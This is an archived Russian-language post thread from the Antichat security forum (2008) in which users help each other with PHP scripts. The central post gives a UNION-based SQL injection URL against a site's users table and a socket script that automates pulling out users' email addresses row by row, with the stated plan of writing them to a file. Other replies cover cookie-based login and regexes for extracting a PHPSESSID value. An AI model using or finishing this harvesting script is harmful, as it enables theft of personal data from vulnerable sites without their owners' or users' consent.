ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
03.01.2008, 20:55
|
|
Постоянный
Регистрация: 08.04.2007
Сообщений: 853
Провел на форуме:
5812656
Репутация:
1540
|
|
Сообщение от Boxs
вот такой скрипт нужно на писать
помогите на писать
 нефтыкнул что должен скрипт делать?
|
|
|
03.01.2008, 22:36
|
|
Познавший АНТИЧАТ
Регистрация: 23.08.2007
Сообщений: 1,237
Провел на форуме:
18127311
Репутация:
1676
|
|
Есть сайт, там авторизация через кукисы. Как сделать, чтобы скрипт после отправлении пост запроса(авторизации) мог с помощью гет запроса получать страницы требующие авторизации?
|
|
|
|
03.01.2008, 22:39
|
|
Постоянный
Регистрация: 11.11.2006
Сообщений: 595
Провел на форуме:
1845062
Репутация:
1079
|
|
Сообщение от Kaimi
Есть сайт, там авторизация через кукисы. Как сделать, чтобы скрипт после отправлении пост запроса(авторизации) мог с помощью гет запроса получать страницы требующие авторизации?
http://php.net/fsockopen
Используй функцию fsockopen и fwrite в ее хэндл
|
|
|
|
04.01.2008, 00:55
|
|
Постоянный
Регистрация: 11.10.2007
Сообщений: 406
Провел на форуме:
7215020
Репутация:
1423
|
|
Допустим на сайте имеется sql инъекция (MySQL база). Есть доступ к таблице users и поле email. Вывод осуществляем так
http://www.site.com/id.php?ID=-1+union+select+1,2,email,4,5,6+from+users
Выводится только 1 юзер из n-ого количества. Пользуемся лимитом для перебора, но в таблице до*я юзеров - нужно автоматизировать процесс. Я сделал такой скрипт
PHP код:
<?php
$PORT = 80;
$ADDR = gethostbyname("site.com");
$fp = socket_create(AF_INET,SOCK_STREAM,SOL_TCP);
socket_connect($fp,$ADDR,$PORT);
$n = 2;
$str1 = "GET http://www.site.com/id.php?ID=-1+union+select+1,2,email,4,5,6+from+users+limit+";
$str2 = ",1 HTTP/1.0\r\n Host: site.com\r\n\r\n";
$str = $str1.$n.$str2;
socket_write($fp,$str,strlen($str));
while($out = socket_read($fp,2048))
{
$s = strstr($out,"<h1>");
$nm = strpos($s,"</h1>");
echo substr($s,4,$nm - 4);
}
socket_close($fp);
echo "<br>";
?>
Все отлично работает - скрипт выводит нам мейл (разумеется работает только с этим сайтом)
НО проблема - почему этот скрипт не работает в цикле ???? Тоесть я хочу, что бы переменная $n (значение лимита) менялась в цикле и каждую итерацию скрипт загружал новую страницу, извлекал оттуда мейл и что-то с ним делал (например записывал в файл). Например так
PHP код:
for($i=0;$i < 10;$i++)
{
$str1 = "GET http://www.site.com/id.php?ID=-1+union+select+1,2,email,4,5,6+from+users+limit+";
$str2 = ",1 HTTP/1.0\r\n Host: site.com\r\n\r\n";
$str = $str1.$i.$str2;
socket_write($fp,$str,strlen($str));
while($out = socket_read($fp,2048))
{}
}
Но не работает. Подскажите плиз почему ?
Последний раз редактировалось ElteRUS; 04.01.2008 в 01:10..
|
|
|
|
04.01.2008, 01:04
|
|
Познавший АНТИЧАТ
Регистрация: 23.08.2007
Сообщений: 1,237
Провел на форуме:
18127311
Репутация:
1676
|
|
С fsock вроде разобрался. Помогите составить регулярку чтобы вытащить из кукиса (PHPSESSID=2311632a0e37308b5403aac65631185d)
значение PHPSESSID
|
|
|
|
04.01.2008, 01:39
|
|
Познающий
Регистрация: 01.01.2008
Сообщений: 50
Провел на форуме:
187422
Репутация:
71
|
|
Сообщение от Kaimi
С fsock вроде разобрался. Помогите составить регулярку чтобы вытащить из кукиса (PHPSESSID=2311632a0e37308b5403aac65631185d)
значение PHPSESSID
Если выдергиваешь из заголовков, переданных веб-сервером без дальнейшей обработки, то предложу свой вариант,
PHP код:
preg_match("~PHPSESSID=([\w\d]+)\;~",$header,$m); //PHPSESSID лежит в $m[1]
|
|
|
|
04.01.2008, 01:16
|
|
Познавший АНТИЧАТ
Регистрация: 09.06.2006
Сообщений: 1,359
Провел на форуме:
5301021
Репутация:
1879
|
|
PHP код:
$pattern = "|[a-z0-9]{32}|is";
preg_match_all($pattern, $text, $out);
и т.д и т.п |
|
|
|
04.01.2008, 01:20
|
|
Banned
Регистрация: 11.08.2006
Сообщений: 1,522
Провел на форуме:
5128756
Репутация:
2032
|
|
$y = "PHPSESSID=2311632a0e37308b5403aac65631185d";
$x = preg_match(/([\w]{32})/,$y,$z);
echo $z;
|
|
|
|
04.01.2008, 01:34
|
|
Познающий
Регистрация: 09.09.2007
Сообщений: 66
Провел на форуме:
188412
Репутация:
41
|
|
|[a-f0-9]{32}| вот так более правильно
|
|
|
|
04.01.2008, 01:50
|
|
Banned
Регистрация: 11.08.2006
Сообщений: 1,522
Провел на форуме:
5128756
Репутация:
2032
|
|
Noiro вместо [\w\d] просто [\w]
зачем в регулярке нужны ~?
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Комбинированный вид